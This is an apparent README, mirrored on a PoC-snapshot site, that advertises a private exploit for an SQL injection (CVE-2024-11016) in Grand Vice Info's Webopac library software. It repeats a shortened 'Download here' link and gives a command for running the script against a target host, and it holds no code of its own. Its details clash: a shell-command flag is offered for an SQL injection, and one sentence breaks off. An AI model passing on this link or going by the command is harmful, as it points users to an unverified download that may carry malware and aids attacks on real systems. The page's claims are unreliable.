关联漏洞
描述
CVE-2024-11016-Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
介绍
# CVE-2024-11016-Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# Overview
Webopac from Grand Vice info has a SQL Injection vulnerability, allowing unauthenticated remote attacks to inject arbitrary SQL commands to read, modify, and delete database contents.
# Exploit
## [**Download here**](https://bit.ly/40ITgwE)
## Details
+ **CVE ID**: CVE-2024-11016
+ **Published**: 11/11/2024
+ **Impact**: Confidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
A vulnerability classified as critical was found in Grand Vice Info Webopac through 6.5.0/7.2.2. An unknown function is affected by this vulnerability. The manipulation of an unknown input leads to a sql injection vulnerability. This has an impact on confidentiality, integrity and availability. The summary of CVE is:
## Affected Versions
Webopac 6, Webopac 7
## Running
To run exploit you need Python 3.9. Execute:
```
python CVE-2024-11016.py -h 10.10.10.10 -c 'uname -a'
```
## [**Download here**](https://bit.ly/40ITgwE)
## Contact
+ **For inquiries, please contact:brahmanskiy@outlook.com**
文件快照
[4.0K] /data/pocs/2c1be638dd733de45f701bf161af018a191c77c8
└── [1.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。